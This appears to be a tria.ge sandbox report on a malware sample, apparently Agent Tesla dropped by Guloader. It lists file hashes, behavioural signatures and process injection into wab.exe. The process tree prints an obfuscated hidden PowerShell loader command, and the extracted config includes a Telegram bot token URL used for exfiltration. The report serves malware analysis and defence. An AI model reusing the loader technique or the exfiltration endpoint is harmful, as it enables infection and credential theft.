Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Overview
overview
10Static
static
3attachments.zip
windows7-x64
1attachments.zip
windows10-2004-x64
1226350194-...64.rar
windows7-x64
10226350194-...64.rar
windows10-2004-x64
7226350194-...64.exe
windows7-x64
10226350194-...64.exe
windows10-2004-x64
10Civilhorto...ng.sko
windows7-x64
3Civilhorto...ng.sko
windows10-2004-x64
3Ejerkredse...31.don
windows7-x64
3Ejerkredse...31.don
windows10-2004-x64
3Ejerkredse...ng.ps1
windows7-x64
8Ejerkredse...ng.ps1
windows10-2004-x64
8Sudsers34/...se.ant
windows7-x64
3Sudsers34/...se.ant
windows10-2004-x64
3Sudsers34/...ns.oxo
windows7-x64
3Sudsers34/...ns.oxo
windows10-2004-x64
3Telekablet...st.txt
windows7-x64
1Telekablet...st.txt
windows10-2004-x64
1Analysis
-
max time kernel
148s -
max time network
153s -
platform
windows10-2004_x64 -
resource
win10v2004-20240226-en -
resource tags
arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system -
submitted
07/03/2024, 13:15
Static task
static1
Behavioral task
behavioral1
Sample
attachments.zip
Resource
win7-20240220-en
Behavioral task
behavioral2
Sample
attachments.zip
Resource
win10v2004-20240226-en
Behavioral task
behavioral3
Sample
226350194-050944-sanlccjavap0003-11764.rar
Resource
win7-20240221-en
Behavioral task
behavioral4
Sample
226350194-050944-sanlccjavap0003-11764.rar
Resource
win10v2004-20240226-en
Behavioral task
behavioral5
Sample
226350194-050944-sanlccjavap0003-11764.exe
Resource
win7-20240221-en
Behavioral task
behavioral6
Sample
226350194-050944-sanlccjavap0003-11764.exe
Resource
win10v2004-20240226-en
Behavioral task
behavioral7
Sample
Civilhortonoms/Dyretmmersken/Mealybug/Laesning.sko
Resource
win7-20240221-en
Behavioral task
behavioral8
Sample
Civilhortonoms/Dyretmmersken/Mealybug/Laesning.sko
Resource
win10v2004-20240226-en
Behavioral task
behavioral9
Sample
Ejerkredsen/Lulledes/Filateliens31.don
Resource
win7-20240221-en
Behavioral task
behavioral10
Sample
Ejerkredsen/Lulledes/Filateliens31.don
Resource
win10v2004-20240226-en
Behavioral task
behavioral11
Sample
Ejerkredsen/Lulledes/Preconizing.ps1
Resource
win7-20240221-en
Behavioral task
behavioral12
Sample
Ejerkredsen/Lulledes/Preconizing.ps1
Resource
win10v2004-20240226-en
Behavioral task
behavioral13
Sample
Sudsers34/Neoterist/Opslagsbindenes/Oplivelse/indsigelse.ant
Resource
win7-20240221-en
Behavioral task
behavioral14
Sample
Sudsers34/Neoterist/Opslagsbindenes/Oplivelse/indsigelse.ant
Resource
win10v2004-20240226-en
Behavioral task
behavioral15
Sample
Sudsers34/Neoterist/Opslagsbindenes/Oplivelse/smreostens.oxo
Resource
win7-20240221-en
Behavioral task
behavioral16
Sample
Sudsers34/Neoterist/Opslagsbindenes/Oplivelse/smreostens.oxo
Resource
win10v2004-20240226-en
Behavioral task
behavioral17
Sample
Telekablets/krakileres/miditest/Herpetotomist.txt
Resource
win7-20240221-en
Behavioral task
behavioral18
Sample
Telekablets/krakileres/miditest/Herpetotomist.txt
Resource
win10v2004-20240226-en
General
-
Target
226350194-050944-sanlccjavap0003-11764.exe
-
Size
626KB
-
MD5
0d4bb5c57ce0f99b36056892cfe87f0c
-
SHA1
bd884e9d666bce68ef23dfa139f6477f1c50f7ab
-
SHA256
0301d446fd70d25f294abb066b139bdc8d5362f86d9d10ae4c5ed13e7e6f311c
-
SHA512
7d404dc721e4eb51f91956b96d3864ae2d2cc9e8c8464d446abf087b84466230ddea2662107b5d192369e8b2211b3616025628dc07f4eb679676144915dcaf6e
-
SSDEEP
12288:RhKVcnRerrRiJJGDktgdRYCryyqmsufs5BKGR9YWYn+4t8w:REGnReZeJGDikBrLqmZgBKgPKnt/
Malware Config
Extracted
agenttesla
https://api.telegram.org/bot5147163644:AAEDa60jT_0f_OgilwiEp-CBiARVO2Rx3Mo/
Signatures
-
AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
-
Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
-
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
pid Process 4224 wab.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 608 powershell.exe 4224 wab.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 608 set thread context of 4224 608 powershell.exe 104 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 11 IoCs
pid Process 608 powershell.exe 608 powershell.exe 608 powershell.exe 608 powershell.exe 608 powershell.exe 608 powershell.exe 608 powershell.exe 608 powershell.exe 608 powershell.exe 4224 wab.exe 4224 wab.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
pid Process 608 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 608 powershell.exe Token: SeDebugPrivilege 4224 wab.exe -
Suspicious use of WriteProcessMemory 11 IoCs
description pid Process procid_target PID 2032 wrote to memory of 608 2032 226350194-050944-sanlccjavap0003-11764.exe 89 PID 2032 wrote to memory of 608 2032 226350194-050944-sanlccjavap0003-11764.exe 89 PID 2032 wrote to memory of 608 2032 226350194-050944-sanlccjavap0003-11764.exe 89 PID 608 wrote to memory of 2492 608 powershell.exe 91 PID 608 wrote to memory of 2492 608 powershell.exe 91 PID 608 wrote to memory of 2492 608 powershell.exe 91 PID 608 wrote to memory of 4224 608 powershell.exe 104 PID 608 wrote to memory of 4224 608 powershell.exe 104 PID 608 wrote to memory of 4224 608 powershell.exe 104 PID 608 wrote to memory of 4224 608 powershell.exe 104 PID 608 wrote to memory of 4224 608 powershell.exe 104
Processes
-
C:\Users\Admin\AppData\Local\Temp\226350194-050944-sanlccjavap0003-11764.exe"C:\Users\Admin\AppData\Local\Temp\226350194-050944-sanlccjavap0003-11764.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:2032 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -windowstyle hidden "$angstfyldtes=Get-Content 'C:\Users\Admin\AppData\Local\aftgtstilsagnenes\Ejerkredsen\Lulledes\Preconizing.Nig';$Bombeeksperterne=$angstfyldtes.SubString(58929,3);.$Bombeeksperterne($angstfyldtes)"2⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:608 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "set /A 1^^0"3⤵PID:2492
-
-
C:\Program Files (x86)\windows mail\wab.exe"C:\Program Files (x86)\windows mail\wab.exe"3⤵
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4224
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
348KB
MD5edac2c2f62e371a80143df8caaec5b24
SHA10b7e4c090f25b6a0ffdab3e1d4e94ea3a706584b
SHA256ae0652e2eedf1db5506d11bdf75d677c37fb7896c64435f6afdf9161235a9616
SHA512aa37fc1656f385b4a18c2cd8edd4c6befec3b9df14fb656bbc831274c4e1708e292e0e60e26470f3159d2ab1819b39594cc854428b65028bc468c43d3d12e3be
-
Filesize
57KB
MD5f5a06265c76853290d3b7ed1c1d3e7b9
SHA14083441407a629edd297d1a480a4957740b99fd1
SHA256f15289a9086ec32c0f072940209c5c50412dde5275dac49a8d271cb53e843eab
SHA51252ef36d8443eec762f2980b0ada477a9b74f0af2d0cedfb73015fbac04c28e85a85af4be6a4f67c6d7ee3b59b07abf6be2042465154ac3525e035947db15d6e8